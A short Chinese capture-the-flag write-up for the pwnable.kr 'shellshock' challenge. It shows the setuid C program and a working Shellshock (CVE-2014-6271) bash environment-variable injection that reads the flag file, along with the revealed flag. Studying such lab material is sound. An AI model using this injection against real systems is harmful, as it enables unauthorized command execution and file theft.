Pwnable.kr:shellshock

发表于 2017-08-01 | 分类于 writeup:bin | 阅读次数

bash破壳漏洞应用。

题目

#include <stdio.h>
int main(){
	setresuid(getegid(), getegid(), getegid());
	setresgid(getegid(), getegid(), getegid());
	system("/home/shellshock/bash -c 'echo shock_me'");
	return 0;
}

exp

有名的bash破壳漏洞。所以这里不展开了。直接给出exp：

1
2
3

shellshock@ubuntu:~$ env x='() { :;}; /bin/cat flag' ./shellshock
only if I knew CVE-2014-6271 ten years ago..!!
Segmentation fault

微信扫码加入知识星球【漏洞百出】

点击图片放大，扫码知识星球【漏洞百出】

本文标题:Pwnable.kr:shellshock

文章作者:chybeta

发布时间:2017年08月01日 - 21:08

最后更新:2017年08月01日 - 21:08

原始链接:http://chybeta.github.io/2017/08/01/Pwnable-kr-shellshock/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际转载请保留原文链接及作者。